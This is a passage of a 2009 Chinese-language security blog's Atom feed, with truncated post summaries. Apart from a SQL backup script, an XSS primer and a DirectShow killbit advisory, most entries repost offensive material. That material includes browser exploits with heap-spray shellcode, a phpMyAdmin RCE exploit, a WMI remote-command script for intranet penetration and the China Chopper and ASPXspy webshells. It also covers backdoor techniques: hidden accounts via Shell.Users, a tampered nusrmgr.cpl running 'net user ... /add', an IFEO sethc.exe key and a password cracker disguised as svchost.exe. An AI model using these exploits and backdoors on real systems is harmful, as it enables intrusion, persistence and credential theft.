src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-620678791616202022</id><published>2009-08-10T19:51:00.001+08:00</published><updated>2009-08-10T19:51:10.808+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TSQL'/><title type='text'>sql server backup</title><summary type='text'>declare @filename nvarchar(100)  set @filename='M:\\DBBACKUP\DS_db_'+replace(replace(replace(replace(CONVERT(char(16), getdate(), 120 ),'-',''),'    ',''),':',''),' ','') +'.bak'    -- print @filename      BACKUP DATABASE [Enterprise] TO DISK = @filename WITH NOINIT , NOUNLOAD , NAME = N'Enterprise_BACKUP', NOSKIP , STATS = 10, NOFORMAT  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/620678791616202022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/620678791616202022'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/08/sql-server-backup.html' title='sql server backup'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8170912480452129251</id><published>2009-07-29T15:07:00.001+08:00</published><updated>2009-07-29T15:07:14.539+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IIS'/><title type='text'>IIS寫許可權檢查工具 for 2k&amp;xp&amp;2003</title><summary type='text'>由於一時疏忽而不小心開啟了IIS的寫許可權，而導致被上傳webshell的情況在目前看來幾乎是不可能了，但是就是有某些伺服器管理員不小心打開了，沒辦法。手工一個一個查太麻煩了，找了些資料，自己用VC++寫了一個檢查工具。  至於為什麼不選擇腳本來弄，考慮是腳本的話，很多伺服器不支持，於是乎就選用了VC++，放上去一運行看日誌就ok了。  程式介紹：     程式在WindowsXP環境下採用VC++ 2005開發。    調用系統ADSI來查看IIS配置資訊。    在Windows 2k（IIS5.0）、WindowsXP（IIS5.1）、Windows2003（IIS6.0）上測試正常。由於沒有IIS7.0的環境，所以沒有測試可用性。    按兩下運行即可，會在程式目前的目錄生成IIS.log檔，當然也會在控制台顯示。    發現在沒有裝IIS的Windows系統上會報錯，^_^，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8170912480452129251'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8170912480452129251'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/iis-for-2k.html' title='IIS寫許可權檢查工具 for 2k&amp;amp;xp&amp;amp;2003'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh5.ggpht.com/_q2SxxmLWIiM/Sm_1IVN8PtI/AAAAAAAABFM/zus5xitfmGU/s72-c/clip_image001%5B3%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7343864874213118911</id><published>2009-07-29T15:04:00.001+08:00</published><updated>2009-07-29T15:04:29.755+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='中國菜刀'/><title type='text'>中國菜刀</title><summary type='text'>產品名稱：中國菜刀   生產廠家：中國菜刀貿易有限公司    廠家地址：http://www.maicaidao.com/    --------------------------------------------------------------------------    免責申明：請使用者注意使用環境並遵守國家相關法律法規！    由於使用不當造成的後果本廠家不承擔任何責任！    --------------------------------------------------------------------------  UINCODE方式編譯，支援多國語言輸入顯示。  一、EVAL用戶端部分    1）要瞭解的    服務端只需要簡單的一行代碼，即可用此程式實現常用的管理功能。    目前支援的服務端腳本：PHP, ASP, ASP.NET。    </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7343864874213118911'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7343864874213118911'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/blog-post_29.html' title='中國菜刀'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_q2SxxmLWIiM/Sm_0d75RGMI/AAAAAAAABFI/3kAepQkCPzU/s72-c/clip_image002%5B3%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1548471689190360722</id><published>2009-07-29T15:02:00.001+08:00</published><updated>2009-07-29T15:03:15.041+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phpMyAdmin'/><title type='text'>pmaPWN! - phpMyAdmin Code Injection RCE Scanner &amp; Exploit</title><summary type='text'># milw0rm.com [2009-06-22]  &lt;?php  $list = array(  '/phpmyadmin/',  '/phpMyAdmin/',  '/PMA/',  '/pma/',  '/admin/',  '/dbadmin/',  '/mysql/',  '/myadmin/',  '/phpmyadmin2/',  '/phpMyAdmin2/',  '/phpMyAdmin-2/',  '/php-my-admin/',  '/phpMyAdmin-2.2.3/',  '/phpMyAdmin-2.2.6/',  '/phpMyAdmin-2.5.1/',  '/phpMyAdmin-2.5.4/',  '/phpMyAdmin-2.5.5-rc1/',  '/phpMyAdmin-2.5.5-rc2/',  '/phpMyAdmin-2.5.5/',</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1548471689190360722'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1548471689190360722'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/pmapwn-phpmyadmin-code-injection-rce.html' title='pmaPWN! - phpMyAdmin Code Injection RCE Scanner &amp;amp; Exploit'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4738995852884904566</id><published>2009-07-29T15:01:00.001+08:00</published><updated>2009-07-29T15:01:44.083+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>跨站腳本XSS</title><summary type='text'>作者：褚誠雲  《程式師》文章。申明。文章僅代表個人觀點，與所在公司無任何聯繫。  1.概述  跨站腳本Cross-Site Scripting（XSS）是最為流行的Web安全性漏洞之一。據統計，2007年，跨站腳本類的安全性漏洞的數目已經遠遠超出傳統類型的安全性漏洞【1】。那麼，什麼是跨站腳本？它的危害性是什麼？Web開發人員如何在開發過程中避免這類的安全性漏洞？就是我們這篇文章要討論的內容。  2.什麼是跨站腳本  2.1 跨站腳本介紹  跨站腳本，就是攻擊者可以將惡意的腳本代碼注入到用戶流覽的其它網頁上。它有好幾種類型。其中最為普遍的類型稱為反射類（Reflection）的跨站腳本。讓我們來看下面這個例子來具體說明XSS的機理。  以一個簡單的ASP網頁舉例。這個ASP網頁的目的很簡單：使用者輸入自身名字，ASP動態產生一個“hello world”的網頁。  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4738995852884904566'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4738995852884904566'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/xss_29.html' title='跨站腳本XSS'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh6.ggpht.com/_q2SxxmLWIiM/Sm_z0rhk8SI/AAAAAAAABE8/yEbMuSqwZL4/s72-c/clip_image001%5B3%5D.gif?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1338104122524473231</id><published>2009-07-29T15:00:00.001+08:00</published><updated>2009-07-29T15:00:29.798+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vbs'/><title type='text'>Rcmd.vbs [Remote Cmd with wmi]</title><summary type='text'>作者：NP  一個vbs腳本，滲透內網用的。   PS:此腳本支持回顯！  On Error Resume Next  Set outstreem=Wscript.stdout  If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then  Set objShell=Wscript.CreateObject("Wscript.shell")  objShell.Run("cmd.exe /k cscript //nologo "&amp;Chr(34)&amp;Wscript.ScriptFullName&amp;Chr(34))  Wscript.Quit  End If  If Wscript.arguments.Count&lt;4 Then  usage()  Wscript.echo "Not enough Parameters."  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1338104122524473231'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1338104122524473231'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/rcmdvbs-remote-cmd-with-wmi.html' title='Rcmd.vbs [Remote Cmd with wmi]'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-566897340237015423</id><published>2009-07-29T14:59:00.001+08:00</published><updated>2009-07-29T14:59:34.696+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vbs'/><title type='text'>命令列下一種新的加帳號的方法</title><summary type='text'>作者：lcx  今天研究了一下用戶控制台檔nusrmgr.cpl，發現調用的是Shell.Users來加用戶，它還同時調用了 wscript.shell、Shell.Application、Shell.LocalMachine這三個組件。不過加用戶的話，這一個 Shell.Users就足夠了。那麼可能在刪掉了net.exe和不用adsi之外，這也可能是一種新的加用戶的方法。代碼如下：  js:  var o=new ActiveXObject( "Shell.Users" );  z=o.create("test") ;  z.changePassword("123456","")  z.setting("AccountType")=3;  vbs:  Set o=CreateObject( "Shell.Users" )  Set z=o.create("test")  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/566897340237015423'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/566897340237015423'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/blog-post.html' title='命令列下一種新的加帳號的方法'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4146826567311028915</id><published>2009-07-29T14:58:00.001+08:00</published><updated>2009-07-29T14:58:48.322+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vbs'/><title type='text'>vbs創建註冊表項</title><summary type='text'>作者：lcx  利用vbs創建註冊表值較簡單，創建註冊表項的話，網上多是用wmi來，例如代碼：  const HKEY_LOCAL_MACHINE = &amp;H80000002  strComputer = "."  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &amp;_  strComputer &amp; "\root\default:StdRegProv")  strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" ‘創建sethc.exe項  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  難道WshShell 物件的</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4146826567311028915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4146826567311028915'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/vbs.html' title='vbs創建註冊表項'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2866923623412221165</id><published>2009-07-29T14:54:00.001+08:00</published><updated>2009-07-29T14:54:59.896+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ColdFusion'/><title type='text'>More on ColdFusion hacks</title><summary type='text'>來源：http://isc.sans.org/diary.html?storyid=6730  Thanks to our reader Adam we received some additional information regarding recent ColdFusion hacks.   As I wrote in the previous diary (http://isc.sans.org/diary.html?storyid=6715), the attackers are exploiting vulnerable FCKEditor installations, which come enabled by default with ColdFusion 8.0.1 as well as some other ColdFusion packages.  The </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2866923623412221165'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2866923623412221165'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/more-on-coldfusion-hacks.html' title='More on ColdFusion hacks'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_q2SxxmLWIiM/Sm_yQtWWlMI/AAAAAAAABE4/VUvqvtJehxk/s72-c/clip_image001%5B3%5D.gif?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8126580568361067915</id><published>2009-07-29T14:53:00.001+08:00</published><updated>2009-07-29T14:53:51.256+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='0day'/><title type='text'>Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit</title><summary type='text'>來源：Xeye  Microsoft DirectShow存在可被遠端利用的堆疊溢位漏洞。  關鍵代碼如下：   -------------------------以下內容有危險，僅為研究使用--------------  var appllaa='0';  var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;  var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +  "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +  "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8126580568361067915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8126580568361067915'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/microsoft-directshow-mpeg2tunerequest.html' title='Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5142131673896333024</id><published>2009-07-29T14:52:00.001+08:00</published><updated>2009-07-29T14:52:51.928+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cpl'/><category scheme='http://www.blogger.com/atom/ns#' term='xp'/><title type='text'>利用cpl檔在xp中留一個後門</title><summary type='text'>   作者：lcx  這是我用restorator 打開nusrmgr.cpl時的情形。你看到了什麼？是不是很吃驚，原來xp中控制台中的“使用者帳戶”選項竟然是html做的。其實不然，微軟的好多組 件的面板都是html做的。這也是微軟為什麼一直無法清掉ie的原因，它牽涉太多了，就算是反壟斷法也不可能讓微軟刪掉ie的。  看到圖中的那個NUSRMGR.HTA文件了嗎？我們可以用它來做下手腳（當然你選別的js檔也是可以的）    我們在裡邊加幾行js語句：  var WshShell = CreateObject("WScript.Shell")  WshShell.Run("net.exe user lcx lcx /add", 0, true)  當然你加下載者更好，我只是做個示例。  然後：  echo y|copy nusrmgr.cpl c:\windows\system32\</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5142131673896333024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5142131673896333024'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/cplxp.html' title='利用cpl檔在xp中留一個後門'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh5.ggpht.com/_q2SxxmLWIiM/Sm_xw4ZipYI/AAAAAAAABE0/1wWtxWxDAOM/s72-c/clip_image002%5B3%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7669736514921106845</id><published>2009-07-29T14:51:00.001+08:00</published><updated>2009-07-29T14:51:26.519+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='0day'/><title type='text'>DirectShow 0DAY第二波警告</title><summary type='text'>來源：80SEC非官方八卦BLOG  漏洞攻擊形勢：  DirectShow 0DAY第二波爆發！！該漏洞在國內已經呈大規模爆發形勢。至少有幾千網站被掛上了該漏洞的網頁木馬！  漏洞攻擊細節：  與第一波的DirectShow 0DAY 不同，這次的漏洞是DirectShow相關msvidctl.dll元件解析畸形MPEG2視頻格式檔觸發溢出，攻擊者可以使用普通的javascript堆噴射方式遠端執行任意代碼。  漏洞來源：http://news.baike.360.cn/3451604/27274290.html  漏洞臨時解決方法：  -------------------KillBit相關元件,將下面的內容保存為.reg檔按兩下即可.-------------------------  Windows Registry Editor Version 5.00  [</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7669736514921106845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7669736514921106845'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/directshow-0day.html' title='DirectShow 0DAY第二波警告'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7779169970241698823</id><published>2009-07-29T14:49:00.001+08:00</published><updated>2009-07-29T14:49:57.312+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='One WebServer'/><category scheme='http://www.blogger.com/atom/ns#' term='JSP'/><title type='text'>Sun One WebServer 6.1 JSP Source Viewing vulnerability</title><summary type='text'>   作者：Kingcope Kingcope &lt;kcope2_(at)_googlemail.com&gt;  Sun One WebServer 6.1 JSP Source Viewing vulnerability  System: Sun-ONE-Web-Server/6.1, Windows Server 2003  SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose   JSP Source code.  A normal URL would look like:  http://server/hello.jsp  To disclose the contents including source code of</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7779169970241698823'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7779169970241698823'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/sun-one-webserver-61-jsp-source-viewing.html' title='Sun One WebServer 6.1 JSP Source Viewing vulnerability'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2481755641050105984</id><published>2009-07-29T14:47:00.001+08:00</published><updated>2009-07-29T14:47:46.916+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit</title><summary type='text'>   milw0rm.com [2009-07-10]  #!/usr/bin/env python   ###############################################################################    # MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #    ###############################################################################  # #   # Tested on Windows 2003 SP2 R2, XPSP3 IE7 #    # #    # Written by SecureState R&amp;D Team #    # Authors: </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2481755641050105984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2481755641050105984'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/ms-internet-explorer-7-video-activex.html' title='MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2298932227049021743</id><published>2009-07-29T14:46:00.001+08:00</published><updated>2009-07-29T14:46:42.541+08:00</updated><title type='text'>本地密碼CRACK工具</title><summary type='text'>作者：isno  本地密碼CRACK工具v0.1  下載地址：http://isno.ys168.com/ 檔案名：lapc.rar  用途：在某些系統上獲得了users許可權，但有又沒其他辦法提權，可以試試用這個小工具在對方電腦（不是在自己電腦跑）跑一下管理員密碼。  用法：把svchost.exe放在對方電腦一個比較深的目錄下，把字典檔命名為d.txt（其他名字無效），運行svchost.exe，程式會先根據字典試密碼，然後進行brute force進行破解。預設會在啟動目錄下建立一個連結windows security check，每次開機後會接著上次的記錄進行破解。如果破解成功，會在同一個目錄下生成一個叫svchost.txt的檔，裡面有破解出的密碼。  一些選項：   -u username 指定用戶名破解，不指定的話默認為Administrator    -o 只運行一次，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2298932227049021743'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2298932227049021743'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/crack.html' title='本地密碼CRACK工具'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1806899986791663610</id><published>2009-07-29T14:45:00.001+08:00</published><updated>2009-07-29T14:45:13.710+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='firefox'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit</title><summary type='text'># milw0rm.com [2009-07-13]  &lt;html&gt;&lt;head&gt;&lt;title&gt;Firefox 3.5 Vulnerability&lt;/title&gt;Firefox 3.5 Heap Spray Vulnerabilty&lt;/br&gt;Author: SBerry aka Simon Berry-Byrne&lt;/br&gt;Thanks to HD Moore for the insight and Metasploit for the payload&lt;div id="content"&gt;&lt;p&gt;&lt;FONT&gt;&lt;/FONT&gt;&lt;/p&gt;&lt;p&gt;&lt;FONT&gt;Loremipsumdoloregkuw&lt;/FONT&gt;&lt;/p&gt;&lt;p&gt;&lt;FONT&gt;Loremipsumdoloregkuwiert&lt;/FONT&gt;&lt;/p&gt;&lt;p&gt;&lt;FONT&gt;Loremikdkw  &lt;/FONT&gt;&lt;/p&gt;&lt;/div&gt;&lt;script </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1806899986791663610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1806899986791663610'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/mozilla-firefox-35-font-tags-remote.html' title='Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8064144438253058557</id><published>2009-07-29T14:42:00.001+08:00</published><updated>2009-07-29T14:42:29.058+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Discuz'/><title type='text'>Discuz! 7.0 及以下版本後臺拿webshell（無需創始人）</title><summary type='text'>作者：oldjun  我很少關心之類的漏洞，已經很少拿站了，遇到DZ更加只是路過，也沒去過多關心DZ的漏洞或者去研究代碼；前不久論壇被人留下一個shell，害我檢查半天，不過既然遇到了，那就公佈出來方便大家。  我先聲明：   1.這個不是我首發，很多牛牛很早之前就發現了，但沒人公佈，ring04h牛那貌似有個：http://ring04h.googlepages.com/dzshell.txt，估計知道的人很多了，我研究的少，知道遲了，慚愧慚愧；    2.我從拿到shell的IIS日誌知道這裡可以利用，即styles.inc.php這個檔，於是看了下，找到利用辦法。後來經flyh4t提醒，居然與ring04h的那個方法一樣，我落後了...  好了，不廢話，看代碼：  &lt;?php  ......  if($newcvar &amp;&amp; $newcsubst) {  if($db-&gt;</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8064144438253058557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8064144438253058557'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/discuz-70-webshell.html' title='Discuz! 7.0 及以下版本後臺拿webshell（無需創始人）'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5692363530254551996</id><published>2009-07-29T14:40:00.001+08:00</published><updated>2009-07-29T14:40:28.049+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webshell'/><category scheme='http://www.blogger.com/atom/ns#' term='asp.net'/><title type='text'>ASPXspy 2.0</title><summary type='text'>作者：Bin  1.開發環境VS2008 + C#，相容FrameWork1.1/2.0，基本實現代碼分離,CSS方便參考了phpspy。   2.密碼為32位元MD5加密(小寫) 默認為 admin.    3.全部採用POST方式提交資料，增強了隱蔽性。    4.增強了IIS探測功能，遍歷IIS網站資訊，絕對路徑，多功能變數名稱綁定，以及IIS帳號密碼。    5.增加了對指定檔的搜索功能。    6.修正了一些資料庫操作的BUG。    7.增強了對註冊表的讀取，此部分由BloodSword完成，在此感謝。    8.修正了對埠的多執行緒掃描    9.增強了埠轉發功能，參考了Cnqing的一些代碼，在此感謝。  免責聲明：此工具為安全檢測工具，任何人使用此工具，做違法國家法律的事情，責任自負！   聯繫方式：E-mail:master@rootkit.net.cn Blog:</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5692363530254551996'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5692363530254551996'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/07/aspxspy-20.html' title='ASPXspy 2.0'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-9174702378544311857</id><published>2009-07-29T14:39:00.001+08:00</published><updated>2009-07-29T14:39:19.046+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='WordPress'/><title type='text'>WordPress 2.8.1 評論顯示xss漏洞</title><summary 